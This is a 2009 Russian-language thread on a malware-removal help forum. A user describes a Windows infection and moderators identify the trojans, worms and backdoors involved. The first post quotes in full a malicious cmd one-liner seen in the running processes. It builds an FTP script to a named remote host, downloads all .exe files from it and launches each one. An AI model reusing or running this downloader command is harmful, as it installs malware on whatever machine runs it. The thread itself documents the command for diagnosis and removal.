Решена Много вирусов

Тема в разделе "Удаление компьютерных вирусов", создана пользователем Dukales, 11 фев 2009.

Статус темы:
Закрыта.
  1. Dukales

    Dukales Активный пользователь

    Сообщения:
    4
    Симпатии:
    0
    у меня та же проблема (была - переустановил Windows):
    я недавно заметил, что в процессах висит такая комманда:
    Cmd /c md SC&cd SC&del /f /s /q *.*&echo open scan.zavan.info>k.x&echo out>>k.x&echo 123>>k.x&Echo mget *.exe>>k.x&Echo bye>>k.x&ftp -i -s:k.x&del k.x&echo for %%i in (*.exe) do start %%i>D.bat&D.bat&del D.bat

    с порождённой им ftp -i -s:k.x
    Ну я зашёл на этот адрес - там пусто, даже LIST не выполняется. Как сделать так, чтобы эта комманда не запускалась - я не знал и смирился.
    Потом мне посчасливилось по несусветной глупости установить некий flowMediaDecoder_60, который представлял из себя ленту новостей с вымогательством :), закрывающей обзор в IE.
    На сайте http://www.spyware-ru.com/ прочитал что надо делать - отключил антивирус и запустил ComboFix.exe - на одном из шагов требовалось. Интернет был включен... Видимо на фтп появилась новая подборка свежайших китайских вирусов))). Вот они безболезненно скачались и прорвало... В процессах висело штук 20 их копий, которые запускали друг друга наперебой, когда убиваешь один из них (жаль сразу все не убить - даже в продвинутом procexp нет такой функции), эксплорер нельзя открыть (сначала вообще-то открывал китайские сайты сам по себе). Сам файл ComboFix.exe был удалён ими видимо (а может и показалось). Всё зависло - я перезагрузил машину. Запуская сканирование NOD32 (2.7 версии) они пытались закрыть окно. Сам резидентный модуль был ими деинсталлирован - в процессах его не висело, переустановка ни к чему не приводила. Я создал документ с именем nod32.txt и открыл блокнотом - он закрылся :). Я знал, что есть функция GetWindowText. Всё кончено - подумал я :(.
    Потом я не долго думая зашёл на фтп scan.zavan.info и скачал их все и запаковал. До сих пор их сигнатуры не находятся в базах nod32 (10.02.09 числа) - при распаковке - тихо.
    8 штук с фтп. И ещё я нашёл на дисках (2 жёстких отцепил перед установкой Windows - чтобы сначала отключить autorun полностью всех типов устройств и скачать базы для nod32 последние предварительно) в корнях какие-то auto.exe и boot.exe - они nod32 определяются как вредоносные. плюс эта "новостная лента" flowMediaDecoder_60.exe. Пароль - virus.
     
    Последнее редактирование: 11 фев 2009
  2. Добро пожаловать!

    Вы обратились в раздел лечения форума Safezone.cc!

    Если Вы этого еще не сделали, выполните пожалуйста правила оформления запроса и прикрепите полученные логи к своему следующему сообщению.

    Ожидайте ответа консультанта.

    Помните, что помощь оказывается бесплатно в свободное от других занятий время.

    Благодарим за ожидание.

     
  3. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.761
    Симпатии:
    14.960
    auto.exe - Worm.Win32.AutoRun.ztg (аккуратнее с флешками)
    boot.exe - not-a-virus:AdWare.Win32.AdMedia.ed

    А также (папка viruses):
    Trojan-Downloader.Win32.VB.kmn
    Backdoor.Win32.Hupigon.fyvq
    Trojan-Downloader.Win32.Agent.bexi


    вывод: помойка однако :(

    Что неопознанно разошлю вирлабам.

    [info]Вложения удалил т.к. в основном пользователи не имеют достаточной квалификации для работы с мальварой, то они смогут заразится.
    [/info]
     
  4. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.761
    Симпатии:
    14.960
  5. Dukales

    Dukales Активный пользователь

    Сообщения:
    4
    Симпатии:
    0
    да уж =( ... помойка - главное все враз скачались.

    Скажите пожалуйста, где искать эту комманду?
    Нигде я не нашёл - искал программкой autoruns с sysinternals.com

    Не подозреваю - всё переустанавливал как резведчик: драйвера с оффсайтов скачивал только, диски отцеплял, авторан выключил по маске 0xFF.
     
    Последнее редактирование: 11 фев 2009
  6. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.761
    Симпатии:
    14.960
    Смените пароли на "критических направлениях".
     
  7. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.761
    Симпатии:
    14.960
    Завершаем анализ:

    flowMediaDecoder_60.exe - Trojan.Win32.Agent2.dmq
    Rootkit.Win32.Small.uc
    Trojan.MulDrop.29482
    DDoS.Attack.123
     
  8. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.761
    Симпатии:
    14.960
    похоже батник в автозагрузке. Сделайте лог RSIT посмотрим (интернет не отключаем, для скачивания HJT).
     
  9. Dukales

    Dukales Активный пользователь

    Сообщения:
    4
    Симпатии:
    0
    дело в том, что я уже переустановил Windows - иначе никак не оживить было систему - поэтому, быть может ценные, следы пребывания этих злосчастных вирусов на моей машине исчезли...
    спасибо за помощь.
     
  10. Dukales

    Dukales Активный пользователь

    Сообщения:
    4
    Симпатии:
    0
    логи RSIT на всякий случай
     
    Последнее редактирование: 12 фев 2009
  11. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.761
    Симпатии:
    14.960
    Приятно смотреть на читсую машину :D
     
  12. anjeyvit

    anjeyvit Активный пользователь

    Сообщения:
    1
    Симпатии:
    0
    Аваст постоянно обнаруживает вирус Win32:Confi [Wrm]

    один находиться по адресу C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\... (создает себе папку а сам вирус остаеться в формате *.jpg или *.gif)
    другой, с именем файла х, но без расширения находиться по адресу C:\WINDOWS\system32

    Причем, если второй аваст благополучно удаляет, то насчет второго он говорит что произошла ошибка или файл используеться другим приложением, приходиться удалять вручную.
    помогите избавиться от этого
     
  13. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.761
    Симпатии:
    14.960
    Приветствую.

    Для корректной помощи нам необходимо увидеть Ваши логи :)
     
Загрузка...
Похожие темы - Много вирусов
  1. Andrey Noskov
    Ответов:
    22
    Просмотров:
    779
  2. chuzik
    Ответов:
    23
    Просмотров:
    1.936
  3. SeeOn
    Ответов:
    25
    Просмотров:
    2.040
  4. Sweetjkee
    Ответов:
    24
    Просмотров:
    3.658
  5. donik
    Ответов:
    43
    Просмотров:
    5.013
  6. siv21102
    Ответов:
    8
    Просмотров:
    1.748
Статус темы:
Закрыта.

Поделиться этой страницей

Загрузка...